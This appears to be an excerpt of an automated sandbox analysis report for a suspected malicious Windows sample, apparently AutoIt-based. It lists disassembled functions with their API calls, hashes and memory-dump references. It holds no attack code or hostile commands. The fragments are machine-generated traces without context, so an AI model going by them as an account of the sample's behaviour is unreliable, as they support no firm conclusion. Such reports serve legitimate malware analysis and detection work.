Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: e310340a574d058b6dd5d17797b901cb497a7fbf1cdcf076d0fb772d5f9f579f
Instruction ID: 8d82df5f76316cdb9bd6ba0ba8a0dbc019cb7873b0495cf3d9c4142d209ba4c7
Opcode Fuzzy Hash: e310340a574d058b6dd5d17797b901cb497a7fbf1cdcf076d0fb772d5f9f579f
Instruction Fuzzy Hash: 8AE0E53154522876DB216FA1DD0DED77F6CEF267E1F40C116F50995060CBB58590CBE1

Function 00A825F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00A8260D
SetTextColor.GDI32(?,000000FF), ref: 00A82617
SetBkMode.GDI32(?,00000001), ref: 00A8262C
GetStockObject.GDI32(00000005), ref: 00A82634
GetWindowDC.USER32(?,00000000), ref: 00ABC1C4
GetPixel.GDI32(00000000,00000000,00000000), ref: 00ABC1D1
GetPixel.GDI32(00000000,?,00000000), ref: 00ABC1EA
GetPixel.GDI32(00000000,00000000,?), ref: 00ABC203
GetPixel.GDI32(00000000,?,?), ref: 00ABC223
ReleaseDC.USER32(?,00000000), ref: 00ABC22E

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 24e61949b54abef2f85cc311003d1068f344d6951caf4d2d9fce91918b647e73
Instruction ID: b18db6821f12a5bed5f2569a3cf0833cbfeda140c608cd17ae61bf8a0541cbf0
Opcode Fuzzy Hash: 24e61949b54abef2f85cc311003d1068f344d6951caf4d2d9fce91918b647e73
Instruction Fuzzy Hash: 6EE06D31514244BBDB216FB8BC49BE83B15EB15332F54C366FA69680E2CBB14AD0DB11

Function 00AD9330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00AD9339
OpenThreadToken.ADVAPI32(00000000,?,?,?,00AD8F04), ref: 00AD9340
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00AD8F04), ref: 00AD934D
OpenProcessToken.ADVAPI32(00000000,?,?,?,00AD8F04), ref: 00AD9354

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 40c0be3564e177cbc3c0953c2bc8cda8a6ec1bc332bb4f2b6dc4cceff3ce8765
Instruction ID: 48e8ab8f4fc8becc10ff46ebba0c0f02aead099122f46f9197dbaba35c0da15c
Opcode Fuzzy Hash: 40c0be3564e177cbc3c0953c2bc8cda8a6ec1bc332bb4f2b6dc4cceff3ce8765
Instruction Fuzzy Hash: E7E04F366112159FD7202FB16D0DB973B6CAF56791F118818A246CF090EE749584C754

Function 00AC0679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00AC0679
GetDC.USER32(00000000), ref: 00AC0683
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AC06A3
ReleaseDC.USER32(?), ref: 00AC06C4

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 845c54679ac3cbb29024c4e6c82a1962f277ae1d4b73eda3172dbb59cf3f2361
Instruction ID: b5691c3da1e6b83412e5952375e8dbb1bfc8a93496b590599d419a8246ecef99
Opcode Fuzzy Hash: 845c54679ac3cbb29024c4e6c82a1962f277ae1d4b73eda3172dbb59cf3f2361
Instruction Fuzzy Hash: EEE0E571810204EFCB01AF60D808A9D7BB1AB8C310F51C009F85AE7210DFB885919F50

Function 00AC068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00AC068D
GetDC.USER32(00000000), ref: 00AC0697
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AC06A3
ReleaseDC.USER32(?), ref: 00AC06C4

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: c15b7d136e040355fed302cbe58d72bdc0f1c345fe6bace309029ddd8d5c2e14
Instruction ID: fe315722349c5d6a8c76757c63a7346cfa2b7a5bce59882d2ff8352fa2d5cd9e
Opcode Fuzzy Hash: c15b7d136e040355fed302cbe58d72bdc0f1c345fe6bace309029ddd8d5c2e14
Instruction Fuzzy Hash: 43E012B1810204AFCB02AFA0D80CA9D7BF2AB8C310F51C008F95AE7210DFB895918F50

Function 00AEB5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00A9436A: _wcscpy.LIBCMT ref: 00A9438D

Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC

__wcsnicmp.LIBCMT ref: 00AEB670
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00AEB739

Strings

LPT, xrefs: 00AEB66A

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: e0511f30c97e0450e9428a57b59369eed94db3654a0ee25defc8345a5bfb2ba8
Instruction ID: 95ab2c5c5d9f04da1bef498b60aba8614b4b361f66e7126c19a2ac21a6310b41
Opcode Fuzzy Hash: e0511f30c97e0450e9428a57b59369eed94db3654a0ee25defc8345a5bfb2ba8
Instruction Fuzzy Hash: CC61A275A10219EFCB14EF95C995EAFB7B4EF48310F118159F906AB391DB70AE40CBA0

Function 00A8E00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00A8E01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 00A8E037

Strings

@, xrefs: 00A8E02B

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 00670b0485a181acd7d8fa8962065d3aadb0ec230efdd7a1061abc80eae373c3
Instruction ID: fdd1e391a4f6b10a60c178d9c5c99031897ad6ae9fa2e8d1f1b2104fdd4a8397
Opcode Fuzzy Hash: 00670b0485a181acd7d8fa8962065d3aadb0ec230efdd7a1061abc80eae373c3
Instruction Fuzzy Hash: 7A515A71408B459BE320AF50E885BAFBBF8FF88714F41884DF1D8411A1EF709529CB16

Function 00B08096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00B08186
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B0819B

Strings

', xrefs: 00B080EF

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 189d2d7175bcb58c64444168666f8489b1f2ad55e1864e543c5c9d243cfe29a1
Instruction ID: a5b1612225847bed2b918ac5dda5effb4e03020bd6119669b457f44a7f717b6f
Opcode Fuzzy Hash: 189d2d7175bcb58c64444168666f8489b1f2ad55e1864e543c5c9d243cfe29a1
Instruction Fuzzy Hash: 35412874A002099FDB10CF64D881BEA7BF5FF09300F1045AAE944EB391DB70AA56CF90

Function 00AF2C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AF2C6A
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00AF2CA0

Strings

|, xrefs: 00AF2C71

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 53925c479e8b2c26f131d00aa00cf70edb40f710fd2249e0dd9d443981c22f7a
Instruction ID: 71c5a006529fe08077895a8cd198b06aaad33e389d4a25f87c804cdc5aa28bad
Opcode Fuzzy Hash: 53925c479e8b2c26f131d00aa00cf70edb40f710fd2249e0dd9d443981c22f7a
Instruction Fuzzy Hash: E8314D71D00119ABCF11EFA1CD85AEFBFB9FF04340F100019F915AA262EB315956DBA0

Function 00B07088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00B0713C
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B07178

Strings

static, xrefs: 00B070D8

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 0b8f08f402ae341e6a88864c95cf9bdb7e1592cb74c206a2fc7f4301e5a613bc
Instruction ID: 17558bb82213bda5a51513f6a370020727ada08b977d0606b3c872b85fdcc7d8
Opcode Fuzzy Hash: 0b8f08f402ae341e6a88864c95cf9bdb7e1592cb74c206a2fc7f4301e5a613bc
Instruction Fuzzy Hash: 52319C71540604AEEB109F78CC80BFBBBE9FF48720F109659F9A5971D0DA30AC81CB60

Function 00AE3049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AE30B8
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AE30F3

Strings

0, xrefs: 00AE30B1

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 414c333b0b9e7624693c8235511dc310ee9fa5588e9daba33863758e9d4289ed
Instruction ID: 11bb23001ed80b3f4938ed5c33f23e2d5d5af553de19b4b34d75720902ae3903
Opcode Fuzzy Hash: 414c333b0b9e7624693c8235511dc310ee9fa5588e9daba33863758e9d4289ed
Instruction Fuzzy Hash: D831F533600285ABEF248F5AC989BAEBBB8EF05350F14411DE981E71A0EB709B40CB50

Function 00AF40B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00AF4132

Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77

Strings

AUTOITCALLVARIABLE%d, xrefs: 00AF4124
, $, xrefs: 00AF4172

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 06395b6453ae8a7ab9ecad5f02de3f9374bf8bb02e3fe5c358302de0d1a978d5
Instruction ID: 860326478b90fd616a50dac9f4cc3cfb6b7966b03e2f2af4f1ef25b8e798a5ff
Opcode Fuzzy Hash: 06395b6453ae8a7ab9ecad5f02de3f9374bf8bb02e3fe5c358302de0d1a978d5
Instruction Fuzzy Hash: C0219131A0021DABCF10EFA4C991EAE77F5EF58740F5004A5FA05A7281DB30EA85CBA5

Function 00B06CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B06D86
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B06D91

Strings

Combobox, xrefs: 00B06D53

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 8927f6401072dffb45cc0400eaa5593de995f71939414ae4316bb156dcaf06bc
Instruction ID: 031254e0bd8459e180e26e7547403650a999ff087cd3412b53b1b00583860c48
Opcode Fuzzy Hash: 8927f6401072dffb45cc0400eaa5593de995f71939414ae4316bb156dcaf06bc
Instruction Fuzzy Hash: 68116071710209AFEF259E54DC81FBB3FAAEB84364F214279F9149B2E0DA719C618760

Function 00B0722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00A82111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A8214F
Part of subcall function 00A82111: GetStockObject.GDI32(00000011), ref: 00A82163
Part of subcall function 00A82111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A8216D

GetWindowRect.USER32(00000000,?), ref: 00B07296
GetSysColor.USER32(00000012), ref: 00B072B0

Strings

static, xrefs: 00B07273

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 359501132a7bb230bddbe3a373e0a4476b4f979069827a108f5199961d4a5f1e
Instruction ID: 4b3e8227cbbabb04b57c66fe2805ddfcc0165aa3126ee9a602b3103b3e6526c3
Opcode Fuzzy Hash: 359501132a7bb230bddbe3a373e0a4476b4f979069827a108f5199961d4a5f1e
Instruction Fuzzy Hash: BA211772A5420AAFDB04DFA8CC45EFABBE8EB09314F004658FD55D3290DB75E891DB60

Function 00B06F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00B06FC7
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B06FD6

Strings

edit, xrefs: 00B06FAB

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 6543e62a2d6d86c9c274ac980dfa84f9221801c994fa437b5b9d22a91aed1eaa
Instruction ID: cca151b847fa1fee0fd3307721446fb471f01ae0af75667728e1f8fc280ad259
Opcode Fuzzy Hash: 6543e62a2d6d86c9c274ac980dfa84f9221801c994fa437b5b9d22a91aed1eaa
Instruction Fuzzy Hash: 55116D7111020AAFEB105E64AC84EEB3FAAEF15368F504754F965931E0CB75DCA09B60

Function 00AE3156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AE31C9
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00AE31E8

Strings

0, xrefs: 00AE31BF

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: a76eeebea13667fd81c2a41ae9c25baf8109ed3d8885e4a42318a3cd768a2577
Instruction ID: 351bc5df960e386c7efd7c74128a4578d377b29290f82ac029c923c367218bd0
Opcode Fuzzy Hash: a76eeebea13667fd81c2a41ae9c25baf8109ed3d8885e4a42318a3cd768a2577
Instruction Fuzzy Hash: 2E110837900254ABDF20DB9ADC4DB9D77B8AF06310F184269E945A7290DB70EF05CB91

Function 00AF28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00AF28F8
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00AF2921

Strings

<local>, xrefs: 00AF28E9

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 72067146ed442360c89c14d5e7f8f79ae5f3e78bfd0f706b1113070d66dc44be
Instruction ID: e297c43b75c85325e3e71647c8032584767c8086675ce17464f766b4538d8828
Opcode Fuzzy Hash: 72067146ed442360c89c14d5e7f8f79ae5f3e78bfd0f706b1113070d66dc44be
Instruction Fuzzy Hash: 5711A370501229BAEB258F918C89FF7FBACFF05791F10812AF64557140E7B05894D7E0

Function 00AF8475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00AF86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00AF849D,?,00000000,?,?), ref: 00AF86F7

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00AF84A0
htons.WSOCK32(00000000,?,00000000), ref: 00AF84DD

Strings

255.255.255.255, xrefs: 00AF84B8

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 52c6edf44dbb129f211c6e683e772eb8c0137e67d8b23cc50613af3c831731cf
Instruction ID: 1d2006e2b28ff8a5f48d0841462359f07532efac5c45fba6559b15d7e0a5324d
Opcode Fuzzy Hash: 52c6edf44dbb129f211c6e683e772eb8c0137e67d8b23cc50613af3c831731cf
Instruction Fuzzy Hash: ED11A13520020AABDB10EFA4CD46FFEB364FF14321F10862AFA15972D1DF75A810C695

Function 00AD99BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77

Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AD9A2B

Strings

ListBox, xrefs: 00AD99F5
ComboBox, xrefs: 00AD99CA

Memory Dump Source

